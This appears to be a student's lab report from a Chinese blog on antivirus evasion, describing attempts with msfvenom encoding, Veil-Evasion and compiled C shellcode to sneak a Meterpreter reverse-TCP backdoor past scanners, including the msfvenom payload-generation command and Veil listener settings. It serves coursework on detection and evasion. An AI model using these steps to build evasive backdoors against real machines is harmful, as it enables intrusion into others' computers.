• 20155334 曹翔 Exp3 免杀原理与实践


    20155334 曹翔 Exp3 免杀原理与实践

    小记:这次实验,困难重重,失败练练,搞得我们是心急如焚,焦头烂额,哭爹喊娘

    一、基础问题回答

    1. 杀软是如何检测出恶意代码的?
      每个杀软都有自己的检测库,每种代码都有属于自己的的特征码,杀软将代码的特征码与检测库中的比对,若有相符的则识别为恶意代码。此外检测该代码的行为,若有恶意行为则判断为恶意代码。

    2. 免杀是做什么的?
      使用各种手段使得恶意代码和杀软共从于电脑中。

    3. 免杀的基本方法有哪些?
      (1)改变特征码、加壳、进行异或、逆序、改变软件的行为等手段;
      (2)使用隧道技术。

    二、 实验步骤

    1. 裸奔,利用之前实验中msf生成后门程序进行:
      结果:

      该后门表示,宝宝也hin委屈,裸奔能不被抓么?

    2.Msfvenom使用编码器生成可执行文件
    (1)一次编码,生成文件命名为5334bdoor.exe

    结果:


    (2)多次编码,生成文件命名为5334bdoor1.exe

    结果:

    1. Veil-Evasion
      这个veil,是我用过最难用的软件了,没有之一,别的软件难用在于不懂怎样操作,她的难点在于安装不上,尽力过三天的反复安装,我决定用老师的了。

      命令 作用
      use c/meterpreter/rev_tcp.py 设置payload
      set LHOST 192.168.1.113 设置反弹IP
      set LPORT 5334 设置反弹端口5334
      generate 生成

      之前使用的是 python ,可惜都没有exe可执行文件。通过参考同学的博客,改用c语言生成,终于有了效果。生成的文件命名为 34bdoor.exe

      拷贝到主机上,并通过网站扫描:

      很遗憾,依旧被拦截。

    2. 调用Shellcode
      换一种方式接着来:
      在kali中进入终端,命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=5334 -f c
      生成数组如下:

      将上边的数组copy进编写的C语言文件,并编译。
      很好,我的codeblock编译不了,这时候我是异常的开心,呵
      又经过同学博客的指点,我在win7的虚拟机上升级了 SP1 版本,安装了 net framework4.5Visual Studio2017耗时+1天,嘿嘿,贼开心,开心到快疯了。
      使用Visual Studio2017编译,名称为Project1:

      得到EXE文件:

      电脑主机说:“向我开炮!!”
      于是:

      “你还是太嫩,哼。”

    3. 回连

    三、实践总结与体会

    只能说这次的实验被veil连累太久,不过好在都解决了。再此谢谢老师和各位同学的帮助。
    这次实验让我看到了,有了杀软的电脑并不是绝对安全的,他只是为我们提供一份保障,让我们普通人的网络能够正常的运行,不会在因为一个简简单单的小代码而破坏生活。
    另外,这也让我更加明白了为啥涉密电脑必须不能连接网络的原因了。

  • 相关阅读:
    STL算法概述
    pentaho DI Tutorial (spoon)
    pentaho DIGet Started (spoon)
    Apache Tomcat 7学习笔记(一) 介绍tomcat7
    蜻蜓resin3.1配置文件中文注释
    CentOS防火墙开启、关闭以及开放指定端口
    CentOS5.6蜻蜓resin服务器的搭建
    (总结)RHEL/CentOS 5.x使用第三方软件库(EPEL与RPMForge、RPMFusion软件库)
    用yum安装lamp环境
    蜻蜓resin服务器虚拟目录的设置
  • 原文地址:https://www.cnblogs.com/bestixx/p/8748181.html
Copyright © 2020-2023  润新知